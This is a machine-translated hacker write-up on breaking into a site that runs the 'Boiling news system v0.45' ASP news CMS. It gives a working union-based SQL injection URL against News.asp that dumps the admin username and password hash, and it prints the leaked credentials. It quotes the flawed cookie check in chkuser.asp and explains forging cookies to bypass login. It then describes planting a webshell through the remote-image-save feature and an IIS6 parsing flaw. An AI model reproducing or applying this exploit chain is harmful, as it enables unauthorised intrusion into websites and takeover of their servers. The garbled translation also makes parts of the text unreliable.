Boiling news system v0.45 SHELL

 
Author: st0p
Reprinted please indicate the source: http://www.st0p.org
We can see that there is no material in the Group sent to the station and opened it. It looks like a boiling news system. However, the version is V0.1, and the corresponding version is not found on the Internet,
We found that there are two versions: 1.1 and 0.45. Remember to go to News. asp injection exists. I tried it. Yes, but because of the different versions, the fields in the news table are different, and all statements are a bit different.
After st0p's attempt, the target site should be 0.45. The following statement is used to successfully obtain the background username and password HASH. I tried 27 fields ..
Http://st0p.org/News.asp? Click = 1 & shu = 20% 201% 20as % 20 NewsID, username % 20as % 20 title, 3% 20as % 20 updatetime, passwd % 20as % 20 click, 5, 6, 7, 8, 9, 10,, 27% 20 from % 20 admin % 20% 20 order % 20by % 202% 20 desc % 20 union % 20 select % 20top % 202

No, we got the username xcb, And the password is c95ca278a74775f8. Then we went to crack MD5, depressed, couldn't find it, couldn't crack it, couldn't we go into the background...
Then I checked the code of version 0.45 and found that the user login verification part is in admin/chkuser. asp. Let's take a look at the code.
<%
IF not (Request. cookies ("KEY") = "super" or Request. cookies ("KEY") = "check" or Request. cookies ("KEY") = "typemaster" or Request. cookies ("KEY") = "bigmaster" or Request. cookies ("KEY") = "smallmaster" or Request. cookies ("KEY") = "selfreg") THEN
First, check the key in cookies. If it is not the value above, the system automatically redirects to the logon page.
Response. redirect "login. asp"
Response. end
END IF
Set urs = server. createobject ("adodb. recordset ")
SQL = "select * from admin where username =" & Request. cookies ("username ")&""
Queries whether username in cookies is a management user.
Urs. open SQL, conn, 1, 3
If urs. bof or urs. eof then
Response. redirect "login. asp"
Response. end
End if
IF Request. cookies ("passwd") <> urs ("passwd") THEN
If the user exists, check whether the passwd field in the cookies is the same as the user's password HASH.
Response. redirect "login. asp"
Response. end
END IF
Urs. close
Set urs = nothing
%> Hey hey, I'm lucky. Although I can't crack the password HASH, I can use it to implement spoofing. Let's look at the exploitation process. We use domain to open http://st0p.org/admin/index.asp. at this time, he will be transferred to login.asp.

Then, we delete the reglevel; fullname; purview; KEY; UserName section in cookies and add UserName = xcb; KEY = super; passwd = c95ca278a74775f8. Replace the UserName and password with your own password, the key can be directly used with super. click Modify

Change the URL to http://st0p.org/admin/index.aspand click the link.

The system successfully enters the background. Hey, let's directly escalate the permission. This system has a function for saving remote images, so we can use it to get SHELL.
First, add the article, and then add the plug-in Image in the editor. The address is the horse on our server, click Insert, select Save remote image, and submit

 

Then we only need to access the added article and copy the image address. the server on the target site is IIS6. I did not report a parsing vulnerability in the previous section. I just used it. Hey hey.
Now we already have a pony, so why don't we say that...
However, the permission of the target site is equivalent to BT. Only the upload directory can be written and cannot be deleted...